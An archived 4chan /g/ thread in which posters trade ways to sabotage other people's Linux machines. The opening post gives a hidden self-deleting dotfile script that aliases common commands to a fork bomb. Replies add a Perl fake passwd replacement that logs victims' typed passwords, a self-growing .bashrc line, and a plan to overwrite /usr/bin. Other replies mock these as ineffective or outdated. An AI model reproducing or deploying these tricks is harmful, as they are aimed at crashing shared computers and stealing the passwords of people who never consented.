[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y ] [Home]
4chanarchives logo
ITT ways we can fuck over Linux users.
Images are sometimes not shown due to bandwidth/network limitations. Refreshing the page usually helps.

You are currently reading a thread in /g/ - Technology

Thread replies: 26
Thread images: 4
File: ryoku mad.jpg (53 KB, 848x480) Image search: [Google]
ryoku mad.jpg
53 KB, 848x480
script with a filename like .helpful_agent.sh
>don't forget the . at the front to hide the file. The name is just incase they find it, which really shouldn't be possible.
alias iceweasel=":(){ :|:& };:"
alias firefox=":(){ :|:& };:"
alias vim=":(){ :|:& };:"
alias vi=":(){ :|:& };:"
alias ping=":(){ :|:& };:"
rm .helpful_agent.sh

Now when their pleb friends borrow a computer they'll use nothing but icons, and whenever a REAL eben terminal user gets infront of the machine he will look a massive fucking retard, and no one will be the wiser. Great script to keep on your USB at Uni, if you wanna discretely fuck someone over.
>>
Lol you are retarded. Aliases persist only in the shell they are defined in. They aren't even in the environment.

Your script wouldn't do anything.

Also forkbombs don't work since long ago.
>>
>>52477568
>Aliases persist only in the shell they are defined in. They aren't even in the environment.
Good point. I should add a line in the .bashrc file to run the script, and add a line to delete the script RIGHT BEFORE the forkbomb initiates.
>Also forkbombs don't work since long ago.
Bullshit. Forkbombs fuck my machine pretty good and I'm using the latest stable version of Debian.
>>
>>52477568
>>52477598
>Aliases persist only in the shell they are defined in. They aren't even in the environment.
A better solution, if you have sudo privelleges on the machine, is to replace everything in /usr/bin with forkbomb commands. But then the icons will also fork bomb?
>>
>>52477598
Besides all that, why would you think that anyone would execute your shellscript without glancing at the source first? I wouldn't.
>>
>>52477649
>why would you think that anyone would execute your shellscript without glancing at the source first? I wouldn't.
This is assuming I have physical access to a public machine. I'll admit the applications are very limited.
>>
What does this bunch of emoticons do to Linux?
>>
>>52477695
>What does this bunch of emoticons do to Linux?
Run a forkbomb of infinite new processes.
>>
>>52477695
Literally nothing on new hardware.
>>
>>52477715
>>52477598
>>52477706

Found the commit that makes forkbombs useless: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=2ad306b17c0ac5a1b1f250d5f772aeb87fdf1eba
>>
File: you will never be taytay's cat.jpg (87 KB, 600x598) Image search: [Google]
you will never be taytay's cat.jpg
87 KB, 600x598
I've got a better idea.
If you have sudo privileges, or can hide code in a larger script needing sudo access for deleting /usr/bin/passwd and replacing it with a perl script like this.
print "
Changing password for momf.
(current) UNIX password: \n";
$password = <STDIN>;
`echo $password >> .password-logs`
print "Error: password typed incorrectly. Please try again.\n
>>
>>52477506
This is shit tier fuckery. Fork bombs were never effective on properly configured machines.

Much better:
echo "echo sleep 0.1 >> ~/.bashrc" >> ~/.bashrc
>>
GODDAMN IT /G/!!! I WAS JUST GETTING USED TO LINUX. NOW >>52477967
>echo "echo sleep 0.1 >> ~/.bashrc" >> ~/.bashrc
GENIUS! The best part is it will take hours, or possibly even weeks before anyone realizes there are any problems on their machine.
>>
>>52477967
I like it.
>>
its all about launching a covert reverse shell
>>
File: mako.gif (599 KB, 500x500) Image search: [Google]
mako.gif
599 KB, 500x500
if you can actually get someone to click a script there are a million times for interesting things you can do than to attempt a forkbomb in the year of our lord two thousand and fifteen plus one

>ryuko literally ever
>>
>>52478077
>if you can actually get someone to click a script there are a million times for interesting things you can do than to attempt a forkbomb in the year of our lord two thousand and fifteen plus one
Well? We're listening.
>>
>>52477967
>
echo "echo sleep 0.1 >> ~/.bashrc" >> ~/.bashrc

The problem with this little Catch-22, is that it takes too long to fuck with the user, and if they're sophisticated enough to use the CLI, they're probably sophisticated enough to check their .bashrc file eventually. Not because they suspect their .bashrc file, but just because they're likely to make edits to that file every now and then anyway.
>>
>>52478151
Not usually. After spending an hour or two writing a nice bash/zshrc, not a whole lot of reason to ever touch it again.
>>
>>52478222
>Not usually. After spending an hour or two writing a nice bash/zshrc, not a whole lot of reason to ever touch it again.
I guess it would only get caught by moderately sophisticated plebs like myself then.
>>
This command will literally fuck up any Linux machine.
del system32

DO NOT RUN THIS YOURSELF I AM SERIOUS THIS IS THE MOST DANGEROUS COMMAND EVER.
>>
>>52478234
>moderately sophisticated
>runs a file that aliases a bunch, claims he is fucking over Linux users
>thinks forkbombs are an effective way to fuck with a Linux user
Maximum retard.
>>
>>52477598
>latest stable version of Debian
So... a kernel from 2002 then?

Also:
>ITT: how OP got fucked over by a friend using a forkbomb, looked like a retard and now he's trying to regain his power level
>>
File: polgay.jpg (359 KB, 1482x1599) Image search: [Google]
polgay.jpg
359 KB, 1482x1599
>ITT literal cancer.
>>
dont worry guys i just uploaded the ubuntu .iso on the pirate bay HAHAH lincucks on suicide watch due to bankruptcy
>>
>>52479488
Oh shit!
Better switch to a better os like Mac OSX! :^)
Thread replies: 26
Thread images: 4

banner
banner
[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y] [Home]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
If a post contains personal/copyrighted/illegal content you can contact me at [email protected] with that post and thread number and it will be removed as soon as possible.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com, send takedown notices to them.
This is a 4chan archive - all of the content originated from them. If you need IP information for a Poster - you need to contact them. This website shows only archived content.